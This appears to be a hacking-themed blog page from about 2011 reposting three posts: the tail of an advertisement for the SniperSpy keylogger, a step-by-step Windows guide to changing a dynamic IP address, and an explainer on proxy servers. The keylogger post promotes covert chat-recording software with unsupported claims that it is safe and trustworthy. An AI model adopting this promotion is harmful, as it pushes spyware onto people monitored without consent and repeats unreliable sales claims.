* Records BOTH sides of chats / IMs in Google Talk, Yahoo IM, Windows Live and more.
* SniperSpy is more easy to install and requires no extra knowledge.
* SniperSpy is recognized by BBC, CNN, CBS and other news networks. Hence it isreputed and trustworthy.

13. How safe is to use SniperSpy?

Sniperspy is completely safe to use since all the customer databases remain confidential and private. SniperSpy do not collect any information from your system other than the information required for the product’s successful operation. They will not contact you in any way unless you request assistance.

14. Is my online order 100% Safe and Secure?

Absolutely Yes! All the e-commerce transactions for SniperSpy is handled by Plimus – they are a trusted online retailer specializing in digitally delivered products. All your information remains private and secure. The safety and protection of your personal information is 100% guaranteed. So you can place your order for SniperSpy with no worries of scam!

SniperSpy is completely reliable, safe and best keylogger out there. It is really worth the price that you pay for it. I promise that you cannot get a better keylogger than this. So what are you waiting for? Go grab SniperSpy now! Visit the following link for more informaion.

Source: Go-Hacking


Bookmark and Share


8
Change IP Address

.
Change IP Address

How to change your IP address in less than a minute? The following trick gives you a step-by-step procedure to change your IP address.

1. Click on “Start” in the bottom left hand corner of screen.
2. Click on “Run”.
3. Type in “command” and hit ok.You should now be at an MSDOS prompt screen.
4. Type “ipconfig /release” just like that, and hit “enter”.
5. Type “exit” and leave the prompt.
6. Right-click on “Network Places” or “My Network Places” on your desktop.
7. Click on “properties”.

You should now be on a screen with something titled “Local Area Connection”, or something close to that.

8. Right click on “Local Area Connection” and click “properties”.

9. Double-click on the “Internet Protocol (TCP/IP)” from the list under the “General” tab.

10. Click on “Use the following IP address” under the “General” tab.

11. Create an IP address (It doesn’t matter what it is. I just type 1 and 2 until i fill the area up).

12. Press “Tab” and it should automatically fill in the “Subnet Mask” section with default numbers.

13. Hit the “Ok” button here.

14. Hit the “Ok” button again.You should now be back to the “Local Area Connection” screen.

15. Right-click back on “Local Area Connection” and go to properties again.

16. Go back to the “TCP/IP” settings.

17. This time, select “Obtain an IP address automatically”.

18. Hit “Ok”.

19. Hit “Ok” again.

20. You now have a new IP address.

Some ISPs do not support this type of procedure and hence there are chances of getting back the same old IP address even after trying this hack.In this case you need to switch off the modem and then switch it on to get the new IP address.

NOTE: All these tricks works only if you have a dynamic IP address . But if you have a static IP address you have no option to change your IP.

Source: Go-Hacking


Bookmark and Share


0
Web Proxies

.
In computer networks, a proxy server is a server (a computer system or an application program) which services the requests of its clients by forwarding requests to other servers. A client connects to the proxy server, requesting some service, such as a file, connection, web page, or other resource, available from a different server. The proxy server provides the resource by connecting to the specified server and requesting the service on behalf of the client. A proxy server may optionally alter the client’s request or the server’s response, and sometimes it may serve the request without contacting the specified server. In this case, it would ‘cache’ the first request to the remote server, so it could save the information for later, and make everything as fast as possible.
A proxy server that passes all requests and replies unmodified is usually called a gateway or sometimes tunneling proxy.
A proxy server can be placed in the user’s local computer or at specific key points between the user and the destination servers or the Internet.

Caching proxy server
A proxy server can service requests without contacting the specified server, by retrieving content saved from a previous request, made by the same client or even other clients. This is called caching. Caching proxies keep local copies of frequently requested resources, allowing large organizations and Internet Service Providers to significantly reduce their upstream bandwidth usage and cost, while significantly increasing performance. There are well-defined rules for caching. Some poorly-implemented caching proxies have had downsides (e.g., an inability to use user authentication). Some problems are described in RFC 3143 (Known HTTP Proxy/Caching Problems).

Web proxy
Proxies that focus on WWW traffic are called web proxies. Many web proxies attempt to block offensive web content. Other web proxies reformat web pages for a specific purpose or audience (e.g., cell phones and PDAs)
Access control: Some proxy servers implement a logon requirement. In large organizations, authorized users must log on to gain access to the ‘WWW.’ . The organization can thereby track usage to individuals.

Anonymizing proxy server
A proxy server that removes identifying information from the client’s requests for the purpose of anonymity is called an anonymizing proxy server or anonymizer.

Transparent and non-transparent proxy server
The term “transparent proxy” is most often used incorrectly to mean “intercepting proxy” (because the client does not need to configure a proxy and cannot directly detect that its requests are being proxied).
However, RFC 2616 (Hypertext Transfer Protocol — HTTP/1.1) offers different definitions:
“A ‘transparent proxy’ is a proxy that does not modify the request or response beyond what is required for proxy authentication and identification.
“A ‘non-transparent proxy’ is a proxy that modifies the request or response in order to provide some added service to the user agent, such as group annotation services, media type transformation, protocol reduction, or anonymity filtering.”

Source: Go-Hacking

Bookmark and Share



 
Ujie Caprone | © 2011 Blogger Template by Ujiecaprone.com